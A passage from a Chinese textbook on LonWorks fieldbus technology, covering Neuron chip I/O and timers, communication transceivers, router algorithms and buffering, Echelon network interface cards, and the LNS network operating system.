如果选择了忽略通信,神经元芯片内部维护所需时间的典型值大约为7200个输入时钟周期,最差所需时间大约为66000个输入时钟周期。典型情况是指有4个接收事务,网络处理器无须修复应用定时器,最差情况是指有最多的接收事务数(16),网络处理器需要修复应用程序中可设置的最大数目的应用定时器(15)。如果未选择忽略通信选项,神经元芯片内部维护所需时间的典型值大约是2000个输入时钟周期,最差值大约为47000个输入时钟周期。所谓典型情况是网络处理器不修复应用定时器;最差情况是MAC处理器必须修复应用程序可设置的最大定时器数(15)。 7.Service引脚 Service引脚是神经元芯片里一个非常重要的引脚,在节点的配置、安装和维护的时候都需要使用该引脚。该引脚既能输入也能输出,输出时,Service引脚通过一个低电平来点亮外部的LED,LED保持为亮表示该节点没有应用代码或芯片已坏;LED以0.5Hz的频率闪烁表示该节点处于未配置状态。输入时,一个逻辑低电平使神经元芯片传送一个包括该节点48位的NeuronID网络管理信号。为完成输入输出功能,该引脚的输入输出以76Hz的频率、50%的占空比复用。当Serv⁃ice引脚没有连接LED和上拉电阻时,Service引脚有一个片内可选(可通过软件设置)的上拉以保证输入是无效的状态。 8.看门狗定时器 神经元芯片为防止软件失效和存储器错误,包含3个看门狗定时器(每个CPU一个)。如果软件和系统没有定时地刷新这些看门狗定时器,整个神经元芯片将自动复位。看门狗定时器的复位周期依赖于神经元芯片输入时钟的频率,例如在输入时钟频率为10MHz时,看门狗定时器周期是0.84s。当神经元芯片处于睡眠状态时,所有的看门狗定时器被禁止。神经元芯片支持节电方式,在这种节电方式下系统时钟和计数器关闭,但是状态信息,包括RAM中的信息不会改变。一旦I/O状态变化,或网络上信息有变,系统便会激活神经元芯片。它的内部还有一个最高1.25Mbit/s的独立于介质的收发器。由此可见,一个小小的神经元芯片,不仅具有强大的通信功能,更集采集控制于一体。在某些情况下一个神经元芯片加上几个分离元件便可成为一个DCS系统中独立的控制单元。 4.3.3神经元芯片应用I/O 一个控制单元要有两个功能:数据采集和控制,因此神经元芯片通过11个引脚(IO0~IO10)连接到特定的应用外围电路,这11个I/O口能够灵活配置,可以根据不同的需求通过软件进行编程,如可以配置成并口、EIA⁃232、定时计数I/O和位I/O等。IO0~IO3带有20mA高电流接收;IO0~IO7可设置为低电平检测锁存;IO0~IO10可设置为TTL标准输入;IO4~IO7可以通过编程设置成带上拉电阻。 1.I/O时序 神经元芯片I/O时序既相互独立又受结构重叠的3个部分的影响:调度器、I/O功能模块固件和硬件芯片。由于调度对I/O时序的影响在相对高的功能级上,因此调度器对所有34个I/O功能模块的影响是近似均匀的。固件和硬件对I/O功能模块的影响则随I/O功能模块类型不同而变化。 2.直接I/O对象 直接I/O对象主要包括位(Bit)I/O对象、字节(Byte)I/O对象、电平检测(Level⁃detect)输入输出对象和半字节(Nibble)I/O对象。 (1)位输入/输出IO0~IO10中的每个引脚均可配置成单个的位输入或输出端口,要求输入信号的电平为TTL电平,而输出的是CMOS电平。其中,IO0~IO3所具有的高电流吸收能力可以使这几个引脚直接驱动多个I/O设备。 (2)字节输入/输出该I/O对象类型用于同时读取或控制8个引脚。对于字节输入/输出,io_in()函数返回值的数据类型和io_out()函数输出值的数据类型为unsignedint,其输入、输出的数据范围为0~255B。 (3)电平检测输入/输出IO0~IO7可分别配置为电平检测输入端口。该I/O对象类型用于检测某一个输入引脚上输入的逻辑电平“0”。它能锁存输入引脚的负跳变,对于10MHz的输入时钟,能检测到最短脉宽为200ns的负脉冲,在一般的应用中均能俘获到任何0电平输入。电平检测输入对象能够在输入端被采样之前将输入值锁存。 (4)半字节输入/输出IO0~IO7中任意4个相邻的引脚均可配置为半字节输入或输出端口。该I/O对象类型输入和输出的数据范围为0~15B。这种对象类型用于同时读取或控制四个相邻引脚。对于半字节输入/输出,io_in()函数返回值的数据类型和io_out()函数输出值的数据类型均为unsignedint。a)串行I/O引脚配置b)串行输入定时图c)串行输出定时图 3.串行I/O对象 在半双工异步串行输入输出对象中,神经元芯片的IO8引脚可配置为异步串行数据输入线,IO10引脚可配置为异步串行数据输出线,如图4⁃12所示。该I/O对象类型用于使用异步串行数据格式传输数据,如EIA⁃232通信。传输的格式为1个起始位、8个数据位和1个停止位。输入串行I/O对象将等待被接收的数据帧的起始位,直到已经等待了接收20个字符所需要的时间才结束。如果在这段时间内没有输入发生,则返回0。当已经收到全部的字节数或已经超过接收20个字符所需要的时间但仍未接收到数据时,输入终止。输入串行I/O对象将在收到无效停止位或奇偶校验位时停止接收数据。在以2400bit/s的速率传输数据时, 4.4通信收发器 LonWorks总线的一个非常重要的特点是它对多通信介质的支持,由于突破了通信介质的限制,LonWorks总线可以根据不同的现场环境选择不同的收发器和介质。 4.4.1双绞线收发器 双绞线收发器是最通用的收发器类型。在许多设计中,双绞线收发器配置可以获得较高的性价比。双绞线与神经元芯片的接口有以下三种类型: 1.直接驱动 直接驱动接口使用神经元芯片的通信端口作为收发器,为了限流和ESD保护,外接了电阻和二极管。如果各节点使用的是普通电源,网络上的节点最多可达64个,则电路板所支持的数据速率最大可达1.25Mbit/s。在普通方式下,电压范围为0.9V~VDD-1.75V,最远传输距离为30m,这是最理想的网络配置选择直接驱动接口。 2.EIA⁃485 与其他的收发器相比,市面上购买到的EIA⁃485收发器有较多的优势,如在性能、费用和体积等方面的优势。在外部部件参数恒定的情况下,可以支持多种数据速率和多种类型的传输线。在有了EIA⁃485收发器以后,直接接口所能获得的电压范围便不如通用方式的电压范围,但通用方式的电压范围又低于变压器耦合式收发器。通用方式的电压范围为-7~+12V,可以通过增加光隔离器来提高电压范围。EIA⁃485收发器有双极性器件和CMOS器件这两种类型。两者相比,CMOS器件功耗低、不需要驱动输出,而双极性器件的价格低于CMOS器件的价格。神经元芯片要采用单端工作方式来实现EIA⁃485网络。LonMark指标建议拥有EIA⁃485收发器的节点使用39kbit/s的数据速率来确保网络节点的互操作性。 3.变压器耦合接口 对于需要高性能、高隔离度、抗干扰能力强的应用最好使用变压器耦合接口,因此,目前相当多的网络收发器采用变压器耦合的方式。变压器耦合收发器设计的数据速率能够达到1.25Mbit/s。变压器有很多种类,Echelon公司有两种速率的收发器,分别为78kbit/s和1.25Mbit/s,见表4⁃6。Echelon公司的收发器的突出优点是具有灵活的拓扑结构(FTT⁃10和LPT⁃10),能支持总线型、环形和星形拓扑结构。 4.4.2电力线收发器 电力线收发器是将通信数据调制成载波信号或扩频信号,然后通过耦合器耦合到220V或其他交直流电力线上,甚至是没有电力的双绞线上。这样做的目的是利用已有的电力线进行数据通信,可以大大减少通信中遇到的烦琐的布线方式。LonWorks电力收发器可以将神经元节点加入到电力线中,它提供了一个简单、有效的方法。电力线上通信的关键问题是:电力线间歇性噪声较大———某些电器的启停、运行都会产生较大的噪声;信号衰减很快;线路阻抗也经常波动。这些问题使得在电力线上通信非常困难。Echelon公司提供的几种电力线收发器,针对这些问题,进行了以下几方面改进。 1)每一个收发器都包括一个数字信号处理器(DSP),完成数据的接收和发送。 2)短报文纠错技术使收发器能够根据纠错码,恢复错误报文。 3)三态电源放大/过滤合成器。 4)动态调整收发器灵敏度算法,根据电力线的噪声动态地改变收发器的灵敏度。 目前经常使用两类电力线收发器:载波电力线收发器和扩频电力线收发器(SpreadSpectrum)。 4.4.3智能收发器 LonWorks收发器是LonWorks智能设备中一个重要组成部分。FT3120和FT3150智能收发器将神经元芯片3120及3150的核心与自由拓扑的收发器数字信号处理电路合成在一起,生成一个低成本的智能收发器芯片。该收发器符合ANSI/EIA709.3标准,速率为78kbit/s,支持双绞线自由拓扑和总线型拓扑,因而在布线上非常灵活,使系统安装简便,系统成本降低,同时提高了系统的可靠性。 此外,该收发器在性能上有了极大的提高,尤其是在对电磁场的干扰隔离方面特别明显,可用在恶劣的环境中,它能够防御来自电动机和开关电源等方面的磁场干扰,并且在一些典型的工业和交通现场,在出现了强大的共模干扰时也能可靠地工作。该芯片只需要极少的外围电路和软件配合工作,因此降低了开发成本和时间,并且还可以与其他主处理器相连,如可同时与Echelon公司的ShortStack微处理器以及其他主处理器芯片一起运用,形成一个基于主机的设备。FT3120和FT3150智能收发器是Echelon公司第三代产品中的重要产品。FT3120和FT3150智能收发器和Echelon公司的高性能通信变压器配套使用,从封装到功能完全和TP/FT⁃10兼容,可以直接同使用TP/FT⁃10或LPT⁃10收发器的设备通信并存于同一个信道。该智能收发器芯片具有与神经元芯片3120和3150相同的控制功能,其内嵌的2KBRAM用于缓存网络数据和网络变量,也带有34个可编程标准I/O模式的11个I/O引脚,在每个芯片中也有唯一的48位ID。FT3120智能收发器支持40MHz主频,同时内置的EEPROM为4KB,给应用提供了更多的空间。FT3120或FT3150智能收发器的结构框图如图4⁃15所示,基于FT3120或FT3150智能收发器的设备示意图如图4⁃16所示。 Echelon公司于2003年推出了智能电力线收发器PL3120和PL3150,智能电力线收发器与PLT⁃21/22收发器完全兼容。智能电力线收发器由以下三部分组成:3个8位处理器的神经元芯片核、电力线模拟集成电路和电力线DSP集成电路。其中,神经元芯片核的3个8位处理器分别是MAC处理器、网络处理器和应用处理器。集成在片上的存储器,用于应用程序、网络管理ANSI⁃709.1协议的执行,存储唯一的48位NeuronID等。智能电力线收发器的工作温度为-40~+85℃,支持的外部时钟频率为6.5536MHz和10MHz(此时智能电力线收发器分别工作在CENELEC的A和C波段),支持硬件全双工的UART/SPI串口等。智能电力线的目的就是为用户降低成本,使用智能电力线收发器,在设备中增加电力线通信功能时,花费相当于以前的1/3。 PL3120和PL3150电力线智能收发器将神经元芯片核心和电力线收发器集成在一起,使它们更适合于家用电器、音视频设备、照明、供热/制冷、安防和计量表等应用领域。电力线智能收发器包含一个高可靠性的窄带电力线收发器,特有的双频调制特性可在主频被噪声阻塞后自动选择备用的第二频段;高性能低开销的FEC前向纠错技术可克服由于噪声引起的错误;采用了最先进的数字信号处理、噪声消除及失真校验算法,纠正了信号传输受到的各种阻碍,包括瞬间噪声、连续音频噪声和相位失真。这些特性使得电力线智能收发器在电子对讲设备、电动机、电子镇流器、调光速及消费类电子产品的各种干扰场合都能可靠通信。电力线智能收发器可以通过低成本的外部耦合电路在任何AC或DC输电干线上或者无动力电的双绞线上通信。 4.4.4其他收发器 1.电源线收发器 电源线收发器指的是通信线和电源线共用一对双绞线。使用电源线收发器的意义在于所有节点通过一个DC48V中央电源供电,这对于一些电力资源匮乏的情况(例如,长距离的输油管线的检测,每隔一段距离就设置一个电源对节点供电,显然是不经济的;使用电池也有经常替换的问题)具有非常重要的意义;另一个方面,通信线和电源线共用一对双绞线,可以节约一对双绞线。由于电源线收发器(LinkPowerTransceiver)采用的是直流供电,所以它可以和变压器耦合的双绞线直接互联。 2.光纤收发器 通常使用的LonWorks光纤收发器是美国雷神公司开发的一系列LonWorks光纤产品,其中包括光纤和双绞线的路由器。其通信速率是1.25Mbit/s,最长通信距离是3.5km,采用LonWorks标准的SMX收发器接口,每一个收发器包含两路独立光纤端口,可以方便地实现光纤环网,增强系统的可靠性。 3.无线收发器 LonWorks技术使得无线收发器可以使用的频率范围很宽。对于价格低廉的无线收发器,典型的频率值是350MHz(Motorola提供这样的收发器)。要使用无线收发器,还需要一个大功率的发射机,同时神经元芯片的通信口配置成单端模式,速率是4800bit/s。 4.5路由器和网络接口 4.5.1路由器 LonWorks路由器用来连接两个通信通道之间的LonTalk信息。LonWorks路由器能支持从简单到复杂的网络的连接,这些网络可以小到几个节点,大到上万个节点。路由器连接示意图如图4⁃17所示,自由拓扑、电力线、78kbit/s总线拓扑三种媒体通过三个路由器连接到一个1.25Mbit/s的双绞线主干信道上。由于使用了路由器,图中的节点可以实现点到点的通信,就如同把它们安装在一个信道上一样。 1.路由器的作用(1)扩展通道的容量由于节点的收发器的负载是确定的,这就决定了每一路通道中的节点数和通道的长度是有限的。可以使用路由器来扩展网络的容量,如使用桥接器来增加多通道以支持更多的节点,也可以使用中继器延长通道的长度。(2)连接不同的通信介质或通信波特率例如,在网络的不同位置上以牺牲数据的传输速率为代价来换取长距离传送,在一些电缆安装较困难或者节点物理位置频繁变动的情况下,可以采用电力线作为通信媒体,也可以使用一个1.25Mbit/s的双绞线做主干信道,连接几个78kbit/s的自由拓扑的电力通信。在所有这些情况下,必须使用路由器来连接不同LonWorks信道。(3)提高LonWorks总线可靠性连到一个路由器上的两个通道在物理上是隔离的,因而一个通道失效并不影响另一个通道的使用。比如在一个工业控制网中,相连的部分之间相76互隔离可以防止因一部分失效而导致其他部分停止工作的情况。(4)全面提高网络性能在子系统内可以用路由器隔离通信。例如,在一个工业区域内,大多数节点通信是在某一部分内部进行的,而不是在各部分之间进行。在各部分之间使用智能路由器可以避免内部报文传输影响其他部分,从而提高了整个网络的吞吐率,同时也减少了通信的反应时间。在节点内,信道之间使用路由器对应用程序是透明的,因而无须了解路由的工作原理就能工作,只有在需要确定一个路由器的节点网络映像时,才考虑路由器的工作原理。如果节点从一个信道移到另一个信道,只需改变节点网络映像。路由器的节点网络映像是由诸如LonMaker之类的网络管理工具来管理的。LonWorks路由器包含两个可供选择的模块以适用于不同的用途,其选项有:(1)路由器组件———RTR⁃10模块路由器组件适于嵌入OEM产品,一个RTR⁃10路由器加上两个收发器模块(分别连接到两个通道上)就组成了一个常规路由器,可以将它封装起来以适用于不同的情况要求。在一些特殊用途中,可以将多个路由器封装在一起,比如一个主干线连接多个通道。RTR⁃10路由器的模块构成的路由器系统示意图如图4⁃18所示。(2)路由算法具体见下述“3.路由算法”。 2.LonTalk协议对路由器的支持LonTalk协议的设计提供了对于路由器透明转发的节点之间报文的支持。为了提高路由器的效率,LonTalk协议定义了一套使用域、子网和节点的寻址层次。为了使多个分散的节点寻址更简化,LonTalk协议定义了另一套使用域和组的寻址层次,配置型路由器也能根据组配置信息给出路由决策。3.路由算法路由器有4种路由算法可供选择:配置型路由器、学习型路由器、桥接器或中继器,这些选项以降低系统性能来换取安装的方便。配置型路由器和学习型路由器属于智能路由器,路由智能可以使它们根据目标地址有选择地转发报文,桥接器转发所有符合它的域的报文,中继器发送所有的报文。采用软件下载的方式分别装配LonWorks路由器虽然降低了系统性能,但配置更简单了。需要注意的是,一个路由器的两端必须使用同一种路由算法。4种路由算法符合如下规则:1)要转发的报文必须进入路由器的输入和输出缓冲队列,因此转发较为频繁的报文必须等待空的输入或输出缓冲区。2)要转发的报文必须要有有效的CRC码。3)优先级报文优先转发,这里优先级指的是转发端的优先级,而不是报文原发端的优先级。如果转发端没有优先值,优先级报文就不会在优先端口转发,然而优先级报文仍然带有优先级标志,所以如果它经过另一个有优先级的路由器,则该路由器将在优先端口转发此报文。 4.中继器中继器是能转发经过两端的所有报文的路由器。无论报文的目标地址和域是什么,只要是接收到有效报文(即带有效CRC码的报文),中继器都能转发。5.桥接器桥接器能转发桥接器两个域中之一的报文。符合这一规则的报文不论其目标地址是什么,桥接器都能转发,桥接器可以用来跨越一个或两个域。6.配置型路由器配置型路由器只转发路由器两个域中之一的报文。路由器两端每一端的每一个域都对应一个转发表(即每一个路由器有4张转发表),每个转发表实际上是一组分别对应于一个域中的255个子网和255个组的转发标志。根据报文的目标子网或组地址,这些标志决定了这条报文是否被转发或被丢弃。网络管理工具能用网络管理报文,根据网络拓扑预置转发表。网络管理工具还能优化网络性能,更有效地利用带宽。转发表有两套,一套在EEPROM中,另一套在RAM中。当路由器上电、复位后,根据“设置路由器模式”选项来初始化时,EEPROM的转发表就复制到RAM中,RAM的转发表用于所有的转发决策。7.学习型路由器学习型路由器只转发路由器两个域中之一的报文。除了子网转发表是通过路由器固件自动更新,而不是由网络管理工具设置外,子网转发表的使用与配置路由器相同。组转发表被置为转发所有带组目标地址的报文。学习型路由器是通过检查路由器收发的所有报文的源子网查明网络拓扑的。由于子网不能跨越一个智能路由器的两个信道,因此,只要子网ID出现在源地址上,路由器就能知道哪一端连接该子网。子网转发表开始被置为转发所有带子网目标地址的报文。每次在报文的源地址区出现一个新的子网ID时,就在子网转发表中清除其相应的标志(即不能转发),通过检查目标地址的转发标志确定该报文应该转发还是应该丢弃。路由器复位,所有的转发标志被清除,因此复位后这种“查明”过程要重新设置。在路由器的两端绝不能同时清除一个给定子网的转发标志,然而,如果一个节点从路由器的一端移到另一端,这种情况就有可能发生。例如,子网1位于一个路由器的A端,路由器只要接到子网1任一节点发送的报文,就会知道子网1的位置,如果把子网1的任一节点移到B端而不重新设置,路由器会查明子网1也在B端,并停止将子网1报文转发到A端。学习型路由器能检测出这种错误并做记录,像配置型路由器一样,学习型路由器有时需要修改ServicePin报文的源地址来阻止报文循环。总之,由于学习型路由器总是转发所有带组目标地址的报文,使用信道带宽的效率就比较低。其好处在于简化了安装,在配置学习型路由器时,安装工具无须知道网络拓扑。8.报文缓冲区当路由器接收到报文时,就将其放在输入缓冲器队列中。为了确保优先级报文永远不会排在多于一个非优先级报文的后面,队列设置了两个报文缓冲器。当优先级报文被转发到路由器的发送端时,优先级报文有其自己的优先输出缓冲器队列,发送端优先发送、优先输出缓冲器队列中的报文,这就保证了这些输出报文的优先处理。报文从输入缓冲器队列到输出缓冲器队列的流程图如图4⁃19所示,报文反方向的流动与此相似,即报文反方向流动存在着另一套输入、输出缓冲器队列。 报文缓冲器的数目和空间受路由器上RAM的大小限制。路由器的每一端有1254B的缓冲器空间,这个空间又分为2个输入缓冲器、2个优先级输出缓冲器和15个非优先级输出缓冲器。这些缓冲器的空间默认值是66B,整个RAM用于缓冲器的空间见表4⁃9。 66B的空间允许路由器处理的数据以地址空间最长来计算,报文中网络变量报文和显式报文的数据最多可达40B,对于任意网络变量、网络管理和网络诊断报文,这个空间是足够大的。在应用中,只有转发多于40B的大的显式报文时,才增大缓冲器的空间、减少非优先级缓冲器的数目。三种缓冲器队列所需的总存储区不能超过1254B。默认缓冲器的配置方法是把大量的缓冲器放在路由器的输出队列,例如,标准的配置方法是在输出队列放置17个缓冲器(2个优先级和15个非优先级)。采用这种排列方式的原因是将进入缓冲区队列之后的报文尽可能保留在输出队列中。上述过程还包括寻查优先级报文,寻查到优先级报文后,通过路由器的优先级输出缓冲器转发,这就保证了优先级报文尽可能快地发送。然而,也有许多报文几乎同时出现在网络上的可能,这时会引起输入队列全满,超量的报文容易失去,这时可将一些报文缓冲器从输出队列移到输入队列,增加输入队列空间。带有较大输入队列的路由器能处理更多的通信量,但会有优先级报文排在几个非优先级报文后面的危险。4.5.2网络接口网络接口是连接PC的一个特殊的网络节点,应能与LonWorks总线上所有分布在现场的智能节点进行对等的数据通信。当现场有数据送到网上后,网络接口要负责把所有发送给它的信息接收下来,并立即转发给PC进行监视和处理;当PC有监控命令或所设参数需要下达时,网络接口也应实现转发功能,及时准确地将PC的信息发送给分布在现场的各相关智能节点。同时,为减轻PC的部分数据处理任务,提高系统的实时性,网络接口也应提供对部分通信数据的打包、拆包和整理等功能。网络接口应具有如下功能: 1)支持可下载的固件映像以使固件容易更新。2)有支持LNS应用程序的网络服务接口(NetworkServiceInterface,NSI)固件。LonTalk协议包括一个可选的网络接口协议,该协议可以用来支持在任何主处理器上运行LonWorks。主处理器可以是微控制器、微处理器或计算机。主处理器管理LonTalk协议的第6层和第7层,并使用LonWorks网络接口来管理第1~5层。LonTalk网络接口协议定义了网络接口与主处理器之间交换数据包的格式,在主处理器上运行的主应用程序可通过网络驱动程序与网络接口通信。网络驱动程序管理缓冲区的分配、缓冲区与网络接口的数据传输、隔离应用部分与网络接口链路层协议之间的差异,LonTalk网络驱动程序协议在主应用程序和网络驱动程序之间定义了标准报文格式。Echelon公司提供了多种类型的LonWorks网络接口卡,包括支持USB的U10/U20卡、半长PCI卡(PCLTA⁃21)以及TypeⅡ型PC卡(PCC⁃10接口卡),此外,还有以太网适配器(i.LON10)。结合LNS应用程序,所有的Echelon公司的网络接口卡都可以作为NSI使用。当PC装配有一个NSI后,它能够对一个LonWorks网络实现系统范围的监控和网络管理。1.U10/U20USB网络接口设备U10/U20USB是一款低成本、高性能的LonWorks网络接口的设备,适用于任何具备USB接口的计算机。U10USB网络接口设备能够利用其可以随意插拔的连接端子,直接连接TP/FT⁃10自由拓扑双绞线(ANSI/EIA709.3)LonWorks信道,并且完全兼容链路电源(LinkPower)信道。U20USB网络接口设备能够通过一个插入式的耦合电路/电源(包含在该产品中)连接PL⁃20电力线(ANSI/EIA709.2)LonWorks信道,它还可以直接连接到10~18V直流电力线上,并且不需要耦合电路。U10和U20USB接口设备和基于LNS和OpenLDV的应用程序以及LonScanner协议分析软件相兼容。2.PCLTA⁃21网络接口PCLTA⁃21网络接口是一个高性能的LonWorks接口,它能够适用于任何带有3.3V或5V的32位PCI总线接口以及可兼容操作系统的计算机。PCLTA⁃21接口卡的特点是集成了双绞线收发器并带有可下载的存储器和网络管理接口,同时还支持Windows操作系统的即插即用功能。PCLTA⁃21接口卡不仅为LNS工具的操作提供基于LNS网络服务接口的功能,还为基于LonManagerAPI工具或者OpenLDV驱动程序的操作提供与微处理器接口程序(Microproces⁃sorInterfaceProgram,MIP)相兼容的网络接口功能。该接口卡的固件可以通过PCLTA⁃21驱动程序从主机下载,这样,当新版本的固件发布时,接口卡可以及时得到更新,而不需要拆卸或者更换PCLTA⁃21接口卡。这个特性延长了接口卡的有效使用时间,并降低了有关软件和固件升级时所需要的时间和费用。针对不同的应用场合,该接口卡可以使用FT⁃3150自由拓扑智能收发器、EIA⁃485收发器、TPT/XF⁃78收发器、TP/XF⁃1250收发器以及PL⁃20电力线收发器,它是一种LNS网络接口服务(NSI),支持基于LNS的应用。3.PCC⁃10PC卡PCC⁃10PC卡提供网络服务接口的功能,用于LNS工具,如LonMaker集成工具。该卡可用于任何具有II型PC卡插槽及兼容操作系统的笔记本式计算机、个人数字助理(PDA) 或嵌入式PC,它集成了自由拓扑收发器,支持自由拓扑及链路电源双绞线信道,而且具有单端及特殊模式的端口,有电流限制的5V直流电源,并提供外部收发器转换接头。该PC卡可下载LNS网络接口和LNS高速网络接口固件,用于支持LNS应用程序。4.i.LON接口i.LONLonWorks互联网连接设备系列包含以下几种不同的产品:1)i.LON600LonWorks/IP服务器,是一个高性能的LonWorks到IP的路由器。2)i.LON100,是一个LonWorks至IP的网关,同时也是一个IP远程网络接口(RNI),包括内置的Web服务器,SOAP/XML接口以及数据记录功能、报警和时序功能,另有I/O控制和读表功能。3)i.LON10是一个IP远程网络接口(RNI)。4)i.LONSmartServer是Echelon公司i.LON互联网服务器系列产品的新产品。i.LON600LonWorks/IP服务器是一个遵循EIA852协议的LonTalk到IP的路由器,它将Internet或任何基于10/100Base⁃T的LAN及WAN作为本地或远程传递LonWorks控制信息的信道。它使用MD5认证确保存取访问的安全性,内部采用一个32位RISC处理器和Echelon公司的LonWorks/IP体系结构,从而为控制、显示、监视应用程序提供最佳的性能。i.LON100通过嵌入的Web页面、自定制的Web页面和WebServices,利用以太网、模拟调制解调器或者外部的GSM/GPRS调制解调器进行远程控制。i.LON100e3服务器作为一个远程网关,可实现远程监视和管理整个控制系统,还能够降低为诊断问题而走访各个站点的成本。i.LON100e3服务器适合不同的设备类型,包括LonWorks、Modbus、M⁃bus、数字量的I/O设备以及脉冲表,它所提供的通用的连通性很容易将设备连接到i.LON100e3,并使这些设备的数据有效地应用到企业IP网络和Internet,还可以通过内置的时序调度、报警和数据应用等实现本地设备的监控。i.LON10适配器是一个低成本、高性能的接口,它可以作为一个远程网络接口(RNI),使用i.LON10每秒钟能够处理超过200个数据包,可以利用电力线或者自由拓扑双绞线连接日常设备。PLT⁃22电力线收发器通过家中或者楼宇的输电干线来传输信号,优点在于无须重新布线,只要将设备插到输电干线上,它就能连接到电力线型号的i.LON10适配器上。FTT⁃10A自由拓扑收发器使用廉价的双绞线来连接设备,自由拓扑技术不受任何布线限制,这样一来安装者能够以最快速的方式自由布线。i.LONSmartServer作为Echelon公司i.LON互联网服务器系列产品的新成员,其配置和管理非常简单,并且还具备本地和远程控制的能力。它提供无与伦比的灵活性,既可以将它作为独立的服务器使用,也可以将它和传统的控制系统集成在一起,或者和基于Echelon公司LonWorks技术的自动化网络集成在一起。基于LonWorks技术的系统可从数百家公司获得产品和服务。无论是升级现有的网络还是开始组建新的网络,i.LONSmartServer都能够帮助用户将能源的消耗降至最低。可编程性、独立运行模式以及内置的网络管理特性使得远程能源诊断或现场监视变得简而易行。i.LONSmartServer的主要特点如下:1)可编程性。系统供应商可以通过编写定制的应用程序扩展i.LONSmartServer的功能,从而用于能源优化、数据分析以及房间和照明控制等。他们还可以编写自己的驱动,以便i.LONSmartServer能够作为网关连接传统的系统或其他网络,例如BACnet和CAN。 2)更广泛的系统集成。多个i.LONSmartServer之间能够通过基于IP的网络(有线的或无线的)相互通信,因此可以在一个系统中把用户所有业务的控制网络联合在一起。现在,即使像BACnet那样的封闭系统也能被集成到相同的楼宇自动化系统中。3)独立工作模式或网络工作模式。对于少于200个设备的小型网络的安装,i.LONSm⁃artServer可以作为一个独立的网络设备工作;对于大型的、复杂的网络应用,它可以和Ech⁃elon公司的LNS网络数据库无缝地集成。在独立工作模式下,i.LONSmartServer自动地安装连接到网络中的设备,之后,用户仍然可以使用基于LNS的工具配置、升级、替换和测试这些设备。即使用户使用了LNS数据库,i.LONSmartServer仍然能够直接访问该数据库。无论用户选择哪种方法都不需要任何额外的集成工作,安装是快速的、集中的和容易实现的。5.微处理器接口程序微处理器接口程序(MIP)是将神经元芯片作为其他微处理器的通信协议处理器的转换固件。MIP可使主处理器实现LonWorks应用功能并使用LonTalk协议与其他节点通信,主机上的应用程序可以发送和接收网络变量的更新和显式报文,以及轮询网络变量。MIP将Lon⁃Talk协议延伸到多种主机上,包括PC、工作站、嵌入式微处理器及微控制器。MIP/P20是3120神经元芯片的一种优化,它提供了廉价的网络接口,而MIP/P50提供用于3150神经元芯片上的更高性能的接口。MIP/DPS是最高性能的版本,为使用双口RAM的3150神经元芯片而设,其特性如下:1)允许任何主处理器接入LonWorks网络。2)基于MIP的网络接口可用于任何主机应用程序。3)高速的双端口RAM可以以最小的主机开销来以每秒几百帧的速度发送和接收报文(MIP/DPS)。4)高速的并口以每秒几百帧的速度发送接收报文(MIP/P20和P50)。5)对于MIP/P50和MIP/DPS来说,可选的链中断可通过异步方式发送上链报文,从而减少了网络交通带来的延时。6)主机应用程序最多可使用4096个网络变量。7)与LonWorks网络接口协议兼容。8)包括网络接口库的ANSIC源代码和主机应用程序例程。9)包括简单的网络驱动程序的ANSIC和汇编源代码。6.ShortStack微服务器软件Echelon公司的ShortStack软件通过在现有的8位、16位或32位微控制器内部增加极少的(少于4KB)附加码,就可以使得产品制造商在他们的产品中增加新的功能,并保留他们原有的开发投资。ShortStack微服务器是一个固件产品,包括ANSI/EIA709.1标准控制网络协议,它使一些本身具有主处理器的设备,比如家用电器,在它现有的设计上作延伸,增加少量的应用代码和驱动,再加上ShortStack微服务器本身,便将原有的产品变成一个LonWorks的网络产品,从而也变成了一个互联网的产品。这种产品可从本地和远程接入,可对其设备进行操作、诊断和监控,也可将其信息纳入企业的数据网络,从而开发新的增值服务。该Short⁃Stack微服务器在家电行业以及某些工业现场应用中有着广泛的应用前景。ShortStack微服务器要与一个配套的软件ShortStackAPI一起使用,以方便在主处理器上开发应用和驱动。它的使用非常简便,包括在主处理器上的应用和驱动的开发以及硬件接口(SPI/SCI)的开发。主处理器上所占内存很小,可使用任意8位、16位或32位的主处理器与之配合使用。ShortStack开发包包括ShortStack微服务器固件、ShortStackAPI、ShortStack向导以及其他配套样例及说明。4.6LNS网络技术4.6.1简介LNS(LonWorksNetworkOperatingSystem)是Echelon公司开发的专为LonWorks网络服务的网络操作系统,它提供给用户一个强大的客户/服务器网络构架,是LonWorks总线的可互操作性的基础。使用LNS提供的网络服务,可以保证多个网络管理工具可以一起执行网络安装、网络维护和网络监测,而众多的客户则可以同时申请服务器所提供的网络功能。LNS包括三类设备:路由器设备(包括中继器、桥接器、路由器和网关)、应用节点(智能传感器、执行器)和系统级设备(网络管理工具、系统分析、人机界面和SCADA站)。采用LNS技术可以给网络使用者带来下列好处:1)减少开发时间和费用。采用LNS技术,允许多个网络安装工具在一个网络系统中同时工作而不会产生冲突。每一个安装工具实际上是作为远程客户来申请网络服务的,由于使用同一个网络数据库,因此不用考虑网络数据库的同步问题。由于这些远程客户不需要拥有网络数据库,这些客户的硬件可以大大简化,降低硬件成本。2)简化了系统集成。LNS技术提供一系列编程手段,对于OEM用户,特别是在Win⁃dows平台开发的用户,开发的任务只是处理网络对象服务的属性、事件和方法。3)访问数据不受限制。LNS允许用户同时使用多台人机接口(Human⁃MachineInter⁃face,HMI)、SCADA站和数据站,同时可以访问网络上的数据。4.6.2LNS编程模式与LNS构架1.LNS编程模式LNS网络操作系统提供了压缩的、面向对象的编程模式,大大缩短了开发时间和对系统的要求。LNS将LonWorks网络变成一个层次化的对象,通过对象的方法、属性和事件对网络进行访问。目前,LNS支持两种编程模式,以适应更多的应用。为了使用户的系统设计简单,LNS尽可能地提供了自动化的功能。1)平台独立编程模式。LNS构架和主机是无关的,它支持任何平台的客户,这些平台可以是嵌入式的微处理器、PC,还可以是UNIX工作站。主机可以通过LNS的应用程序编程接口(ApplicationProgrammaticInterface,API)来操作LNS。2)Windows编程模式。在Windows环境下,LNS提供了基于ActiveX和COM组件方式的开发接口,开发人员可以在此基础上进行简单、快速的开发。这里LNS称之为组件架构(LonWorksComponentArchitecture,LCA)。 